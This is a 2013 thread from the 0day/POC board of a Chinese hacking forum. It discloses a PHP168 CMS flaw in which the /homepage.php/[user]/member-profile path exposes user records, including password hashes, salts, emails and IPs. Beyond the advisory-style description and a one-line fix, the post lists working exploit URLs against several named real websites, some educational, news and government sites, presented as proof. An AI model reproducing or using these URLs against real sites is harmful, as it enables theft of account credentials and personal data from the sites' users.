搜索
中国白客联盟»论坛 Techniques 0day及EXP(0day and POC) PHP168一个神奇的漏洞,可查询任意用户数据
返回列表 发新帖
查看: 657|回复: 2

PHP168一个神奇的漏洞,可查询任意用户数据

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-9-20 21:31:40 来自手机 | 显示全部楼层 |阅读模式
简要描述:
国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。
详细说明:
PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile

以PHP168官方演示站点为例,查看任意用户信息的页面链接为:

http://php168.cn/com/homepage.php/admin/member-profile

由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。

漏洞证明:
该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:

http://www.zjfzol.com.cn/homepage.php/admin/member-profile

http://www.scswl.cn/homepage.php/admin/member-profile

http://www.tunet.edu.cn/homepage.php/admin/member-profile

http://www.itlead.com.cn/homepage.php/admin/member-profile

http://www.aedp.cn/homepage.php/admin/member-profile

http://www.qianlongnews.com/homepage.php/test/member-profile

http://ny.zlxk.com/gov/homepage.php/admin/member-profile
修复方案:
去掉输出
回复

使用道具 举报

专业回帖 该用户已被删除
发表于 2013-9-20 23:01:28 | 显示全部楼层
我是个凑数的。。。
回复 支持 反对

使用道具 举报

专业回帖 该用户已被删除
发表于 2013-9-20 23:19:53 | 显示全部楼层
有道理。。。
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表